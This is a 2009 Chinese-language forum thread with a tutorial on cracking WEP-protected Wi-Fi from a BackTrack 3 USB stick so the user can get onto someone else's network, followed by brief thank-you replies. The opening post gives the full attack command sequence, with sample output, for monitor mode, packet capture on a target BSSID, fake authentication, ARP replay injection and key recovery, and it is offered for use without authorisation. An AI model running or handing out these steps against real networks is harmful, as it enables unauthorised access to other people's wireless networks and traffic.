xaylb 发表于 2009-2-21 17:33

教您一步一步破解,ceng,(BT3 usb版)

一、先开始制作启动U盘
  将下载好的backtrack3(BT3) usb版(下载地址在文章末尾)文件bt3b141207.rar直接解压到U盘(1G以上容量)。把Boot 和BT3两个文件夹放到U盘的根目录,打开BOOT文件夹双击运行" bootinst.bat "批处理文件。U盘里就会多出4个文件." isolinux.boot" "isolinux.cfg" "isolinux.bin " "syslinux.cfg" (如果想要中文截面的BT3的菜单,就在下载BT3中文语言包。下载地址http://file.mofile.com/cn/docs/listallfiles.do 提取密码4871454552251231。(用的是免费的网络硬盘,广告较多,有些朋友可能没认真看没找到,我说下大概位置,输入提取码后,拉到中间找下面的几个字(红色的) 以下这三个链接后两个均可下载
  推荐快车(flashget)高速下载文件 下载文件(IE浏览器) 下载文件(非IE浏览器)
  )把压缩包里的"中文包"解压出来,将里面的*.lzm文件拷贝到u盘的BT3\modules目录,即可实现bt3中文化。)
  二、之后重启 windows 进入BIOS设置,把BIOS里的frist boot device设置为USB-HDD(或者是USB--ZIP)再重启选择从usb启动。系统进入backtrack3 系统。
  三、现在开始破解
  1.在shell窗口中输入 ifconfig 命令 ,出现如下信息
  lo no wireless extensions.
  eth0 no wireless extensions.
  eth1 IEEE 802.11g ESSID:"" Nickname:""
  Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
  Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
  Retry:off RTS thr:off Fragment thr:off
  Encryption key:off
  Power Management:off
  Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
  Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
  Tx excessive retries:0 Invalid misc:0 Missed beacon:0
  2.找出你的无线网卡名字,我这里是 eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入 ifconfig 命令 ,返回如下信息
  lo no wireless extensions.
  eth0 no wireless extensions.
  eth1 IEEE 802.11g ESSID:"" Nickname:""
  Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
  Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
  Retry:off RTS thr:off Fragment thr:off
  Encryption key:off
  Power Management:off
  Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
  Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
  Tx excessive retries:0 Invalid misc:0 Missed beacon:0
  3. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
  命令中的11 表示要破解的频道号,bssid后面的数字表示破解目标的MAC物理地址,outputs表示要生成的包的名称。回车运行。
  4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
  其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址,00:A1:C1:D8:A5:B6表示本机网卡MAC物理地址
  5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
  获取更多的数据包。
  6.返回数据量到1万的时候就可以破解了。再开一个shell输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功,让它继续抓包,直到破解。
  BT3(backtrack3) usb版 下载地址列表
  backtrack3(BT3) usb版 下载地址列表(自己选个快的镜像下)
  BT下载
  Torrent: http://www.remote-exploit.org/bt3b141207.rar.torrent
  http://www.offensive-security.com/bt3b141207.rar.torrent
  FTP下载
  ftp://ftp.heanet.ie/mirrors/backtrack/bt3b141207.rar
  ftp://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.rar
  ftp://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar
  HTTP下载
  http://mirror.switch.ch/ftp/mirror/backtrack/bt3b141207.rar
  http://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.rar
  http://ftp.heanet.ie/mirrors/backtrack/bt3b141207.rar
  http://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar
  http://ftp.belnet.be/mirror/backtrack/bt3b141207.rar
  http://backtrack.mick27.info/bt3b141207.rar

liyg 发表于 2009-2-21 18:48

本帖最后由 liyg 于 2009-2-21 18:50 编辑

本论坛崇尚分享,也鼓励大家分享相关经验,版主会根据你发帖质量给予奖励。不建议拿经验卖钱,尤其是将转载来的东西拿出来卖钱。故取消了你的1个金币浏览权限,为奖励你对本论坛的贡献,特予以6个金币的奖励。

dasina 发表于 2009-2-27 00:05

谢谢斑竹! 努力补充知识中

蹭网的蜘蛛 发表于 2009-2-27 01:01

太感谢楼主了

kun21 发表于 2009-2-27 05:13

本论坛崇尚分享,也鼓励大家分享相关经验,版主会根据你发帖质量给予奖励。不建议拿经验卖钱,尤其是将转载来的东西拿出来卖钱。故取消了你的1个金币浏览权限,为奖励你对本论坛的贡献,特予以6个金币的奖励。
liyg 发表于 2009-2-21 18:48 http://forum.anywlan.com/images/common/back.gif
所得有道理,支持下

lixu163 发表于 2009-2-27 10:28

这篇是转载的,正本我看过,是百度贴吧

davidqiang 发表于 2009-3-1 16:44

支持:victory:

waj110 发表于 2009-3-6 13:53

看看啊 !!学习

wxfzyy 发表于 2009-3-12 01:30

我明天做一个试一下.

灰兔 发表于 2009-3-12 08:54

看看啊 !!学习

xaylb 发表于 2009-3-13 20:06

学习了,会用到的、

zgwxmh09 发表于 2009-3-13 20:53

不太懂,学习学习了。
页: [1] 2
查看完整版本: 教您一步一步破解,ceng,(BT3 usb版)